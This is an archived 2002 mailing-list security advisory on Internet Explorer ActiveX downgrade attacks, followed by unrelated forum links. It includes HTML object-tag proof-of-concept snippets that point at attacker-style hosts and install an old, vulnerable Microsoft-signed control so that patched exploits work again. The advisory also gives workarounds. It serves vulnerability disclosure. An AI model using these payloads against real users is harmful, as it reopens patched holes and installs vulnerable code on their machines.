Digitally signing buggy components (Version 2.0)

From: Georgi Guninski (guninski@GUNINSKI.COM)
Date: 05/06/02


Date:         Mon, 6 May 2002 17:25:26 +0300
From: Georgi Guninski <guninski@GUNINSKI.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

Digitally signing buggy components (Version 2.0)

Date: 14 February 2002
Updated: 6 May 2002 (Updated Proof of Concept)

Legal Notice:
This Advisory is Copyright (c) 2002 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission.

Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.

Description:

ActiveX in internet explorer allows downloading from the web and installing
signed components (native code) on the user computer.

As history shows a lot of ActiveX components are buggy and new version is
released. The interesting part is the buggy version is still really signed and
available in one form or another.

A pure hypothethical scenario is to try to install the old buggy signed version
if the user don't have it or on top of the patched one.
Basically this is done this way:
--------------------
[object codebase="http://evilhost/buggyreallysigned.file"
classid="clsid:speciallycrafted"]
[/object]
--------------------

Proof of concept:

So it turned exploitable on my poor windows box.

Ingredients needed:
You need outlctl.dll version 10.0.2616.0 (Signed by microsoft)
It is distributed with the original (not patched) Office XP, so you may get
it from a *clean* install of Office XP.
For some reasons I keep it still.
Microsoft distributed the same buggy control in a CAB on their site but
(un)fortunately it is no longer available there, but the CDs still have it.
Place outlctl.dll on an accessible web server, say http://msux/outlctl.dll.
Place the following in html file ("<" and ">" changed to "[" "]" to avoid spam.
-------------------------
[object id="o1" codebase='http://msux/outlctl.dll'
    classid="clsid:11111111-1111-1111-1111-111111111112"
]
[param name="folder" value="Inbox"]
[/object]
--------------------------
The expected result is to see a box saying
"do you want to install some warez? They are really signed by microsoft and
according to the dialog verisign can confirm they are signed by them".
(the buggy warez is really signed by microsoft) and nothing more
If the user chooses "yes" or has chosed always to trust warez signed by microsoft
then http://www.guninski.com/vv2xp.html starts working again.

So, I wonder whether doing such mischief may lead to old exploits start
working?
(Updated: now I know, it works)

Workaround/Solution:
Anyway, to prevent such stuff, in internet explorer security options
disable everything that contains "active".
Or at least if you see a prompt "...This is digitally signed by X..."
think do you really trust X having in mind his security record.
Reapply the microsoft patch after trying the demo.
Don't ever chose "Always trust them".

Regards,
Georgi Guninski
http://www.guninski.com



Relevant Pages

  • Re: Brian Valentine leaves M$ for Amazon.
    ... >> Microsoft has too much invested in Vista to let it fail. ... "All indications are it's slow and quite buggy". ... Steve (writing this from a not-so-slow-nor-buggy Windows Mail in Windows ... "Microsoft's next-generation operating system, Windows Vista, could get ...
    (comp.sys.mac.advocacy)
  • Re: [opensuse] The Leopard Shows its Spots
    ... Microsoft, whose software is notoriously buggy, believes that the open soure community has somehow stolen that buggy code...and made much less buggy products out of it: ... And as a mature company facing unfavorable market trends ... Microsoft knows how to put a pretty face on a pig, but it has yet to figure out how to fix the pig." ...
    (SuSE)
  • Re: Demand That Microsoft Sell No Code Before Its Time
    ... Or Congress because the legislation it crafts is buggy? ... > This Andy has no job other than being a parasite off of Microsoft. ...
    (microsoft.public.windowsxp.general)
  • Re: Delphi 2005 and missing component equivalents for VS
    ... Will DeWitt Jr. ... > is Microsoft even able to use it? ... I didn't say it was buggy, I said it was screwed up, i.e. it didn't ... Nick Hodges -- TeamB ...
    (borland.public.delphi.non-technical)